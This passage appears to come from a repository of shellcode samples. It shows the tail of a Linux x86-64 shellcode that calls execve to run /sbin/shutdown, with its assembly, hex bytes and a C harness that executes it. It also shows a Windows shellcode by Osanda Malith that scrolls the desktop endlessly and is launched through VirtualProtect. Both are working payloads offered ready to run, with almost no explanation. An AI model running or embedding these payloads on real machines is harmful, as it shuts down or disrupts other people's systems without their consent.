/sbin/shutdown 27 | mov r10, 0x6e776f6474756873 28 | push r10 29 | push r8 30 | mov rdi, rsp 31 | 32 | push rdx 33 | push rbx 34 | push rcx 35 | push rdi 36 | mov rsi, rsp 37 | 38 | add rax, 59 39 | syscall 40 | 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a" 47 | "\x77\x66\x68\x6e\x6f\x48\x89\xe3" 48 | "\x50\x66\x68\x2d\x68\x48\x89\xe1" 49 | "\x50\x49\xb8\x2f\x73\x62\x69\x6e" 50 | "\x2f\x2f\x2f\x49\xba\x73\x68\x75" 51 | "\x74\x64\x6f\x77\x6e\x41\x52\x41" 52 | "\x50\x48\x89\xe7\x52\x53\x51\x57" 53 | "\x48\x89\xe6\x48\x83\xc0\x3b\x0f" 54 | "\x05"; 55 | 56 | int 57 | main() { 58 | 59 | printf("Shellcode Length: %d\n", (int)strlen(code)); 60 | int (*ret)() = (int(*)())code; 61 | ret(); 62 | 63 | return 0; 64 | } 65 | -------------------------------------------------------------------------------- /vhscroll.c: -------------------------------------------------------------------------------- 1 | # include 2 | # include 3 | # include 4 | # include 5 | 6 | /* 7 | * Title: Shellcode to scroll your desktop vertically and horizontally infinitely 8 | * Author: Osanda Malith Jayathissa (@OsandaMalith) 9 | * Website: https://osandamalith.com 10 | * This was strictly made for fun :) 11 | */ 12 | 13 | int main() { 14 | char *shellcode = 15 | "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x24\x02\x01\x01\x81\xf1\x01\x01" 16 | "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x06\x0f\x44\xc6\xaa" 17 | "\xe2\xf6\xe8\x06\x06\x06\x06\x5e\x8b\xfe\x81\xc6\xf2\x02\x06\x06" 18 | "\xb9\x03\x06\x06\x06\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83" 19 | "\xec\x3c\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\x20\x02\x06\x06\x8b" 20 | "\xf0\x68\xfe\x02\x06\x06\xff\xd6\x68\x0b\x03\x06\x06\xff\xd6\x68" 21 | "\x15\x03\x06\x06\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xff\x01\x06\x06" 22 | "\xb9\x49\x67\xd2\xbe\xe8\xf5\x01\x06\x06\x8b\xd8\xb9\xdb\xda\xeb" 23 | "\xd0\x89\x5d\xcc\xe8\xe6\x01\x06\x06\xb9\x4c\x0c\x02\xae\x89\x45" 24 | 
"\xfc\xe8\xd9\x01\x06\x06\xb9\xa7\x0b\x59\x08\x89\x45\xc4\xe8\xcc" 25 | "\x01\x06\x06\xb9\xaa\xf7\xb4\x69\x89\x45\xe0\xe8\xbf\x01\x06\x06" 26 | "\x8b\xf0\xb9\xda\x7c\x54\xcb\x89\x75\xd0\xe8\xb0\x01\x06\x06\xb9" 27 | "\x13\xd4\x9b\xc3\x89\x45\xe8\xe8\xa3\x01\x06\x06\xb9\xe2\x9d\x97" 28 | "\xbc\x89\x45\xf8\xe8\x96\x01\x06\x06\xb9\x33\xd6\x41\xc3\x89\x45" 29 | "\xdc\xe8\x89\x01\x06\x06\xb9\x0f\xa4\xbf\xd1\x89\x45\xd8\xe8\x7c" 30 | "\x01\x06\x06\xb9\x32\xe6\xd6\x1c\x89\x45\xd4\xe8\x6f\x01\x06\x06" 31 | "\x89\x45\xe4\x6a\x06\xff\xd3\x6a\x06\x8b\xf8\xff\xd6\x8b\xd8\x6a" 32 | "\x01\x89\x5d\xf4\xff\xd6\x8b\xf0\x8d\x0c\x36\x51\x53\x57\xff\x55" 33 | "\xe8\x57\x89\x45\xec\xff\x55\xe4\xff\x75\xec\x8b\xd8\x53\xff\x55" 34 | "\xf8\x68\x20\x06\xcc\x06\x89\x45\xc8\x33\xc0\x50\x50\x57\x56\xff" 35 | "\x75\xf4\x50\x50\x53\xff\x55\xfc\x68\x20\x06\xcc\x06\x33\xc0\x50" 36 | "\x50\x57\x56\xff\x75\xf4\x56\x50\x53\xff\x55\xfc\x8b\xc6\x89\x75" 37 | "\xf0\x68\x20\x06\xcc\x06\x50\x33\xc0\x50\x53\x56\xff\x75\xf4\x50" 38 | "\x50\x57\xff\x55\xfc\x6a\x05\xff\x55\xe0\x8b\x45\xf0\x83\xe8\x05" 39 | "\x89\x45\xf0\x79\xdc\x33\xf6\x56\x57\x6a\x0f\x56\xff\x55\xdc\xff" 40 | "\x75\xec\xff\x55\xd8\xff\x75\xc8\x53\xff\x55\xf8\x53\xff\x55\xd4" 41 | "\x56\xff\x55\xcc\x8b\x7d\xd0\x6a\x06\x8b\xf0\xff\xd7\x6a\x01\x8b" 42 | "\xd8\xff\xd7\x50\x8d\x0c\x1b\x51\x56\x89\x45\xf4\xff\x55\xe8\x56" 43 | "\x89\x45\xf0\xff\x55\xe4\xff\x75\xf0\x8b\xf8\x57\xff\x55\xf8\x68" 44 | "\x20\x06\xcc\x06\x89\x45\xc8\x33\xc0\x50\x50\x56\xff\x75\xf4\x53" 45 | "\x50\x50\x57\xff\x55\xfc\x68\x20\x06\xcc\x06\x33\xc0\x50\x50\x56" 46 | "\xff\x75\xf4\x53\x50\x53\x57\xff\x55\xfc\x8b\xc3\x89\x5d\xec\x68" 47 | "\x20\x06\xcc\x06\x33\xc9\x51\x50\x57\xff\x75\xf4\x53\x51\x51\x56" 48 | "\xff\x55\xfc\x6a\x05\xff\x55\xe0\x8b\x45\xec\x83\xe8\x08\x89\x45" 49 | "\xec\x79\xdc\x33\xdb\x53\x56\x6a\x0f\x53\xff\x55\xdc\xff\x75\xf0" 50 | "\xff\x55\xd8\xff\x75\xc8\x57\xff\x55\xf8\x57\xff\x55\xd4\x56\x53" 51 | 
"\xff\x55\xc4\x8b\x75\xd0\x8b\x5d\xcc\xe9\xb5\xfe\xff\xff\x33\xd2" 52 | "\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03" 53 | "\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x8d\x41\xf8\xc3\x55" 54 | "\x8b\xec\x83\xec\x14\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x06\x06" 55 | "\x06\x89\x45\xfc\x8b\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x89\x45\xec" 56 | "\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff\x8b\x70\x18\x8b\x3f\x85\xf6" 57 | "\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33" 58 | "\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b\x4c\x33\x20\x89\x45\xf8\x33" 59 | "\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc\x39\x44\x33\x18\x76\x22\x8b" 60 | "\x0c\x81\x03\xce\xe8\x75\xff\xff\xff\x03\x45\xf8\x39\x45\xf4\x74" 61 | "\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89\x45\xfc\x3b\x44\x33\x18\x72" 62 | "\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xfc" 63 | "\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d" 64 | "\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf\x2b\x06\x06\x06\x32\x06\x06" 65 | "\x06\x39\x06\x06\x06\x6b\x65\x72\x6e\x65\x6c\x33\x32\x2e\x64\x6c" 66 | "\x6c\x06\x67\x64\x69\x33\x32\x2e\x64\x6c\x6c\x06\x75\x73\x65\x72" 67 | "\x33\x32\x2e\x64\x6c\x6c\x06"; 68 | 69 | DWORD oldProtect; 70 | 71 | wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode)); 72 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); 73 | 74 | if (!ret) { 75 | fprintf(stderr, "%s", "Error Occured"); 76 | return EXIT_FAILURE; 77 | } 78 | 79 | ((void(*)(void))shellcode)(); 80 | 81 | VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); 82 | 83 | return EXIT_SUCCESS; 84 | } 85 | --------------------------------------------------------------------------------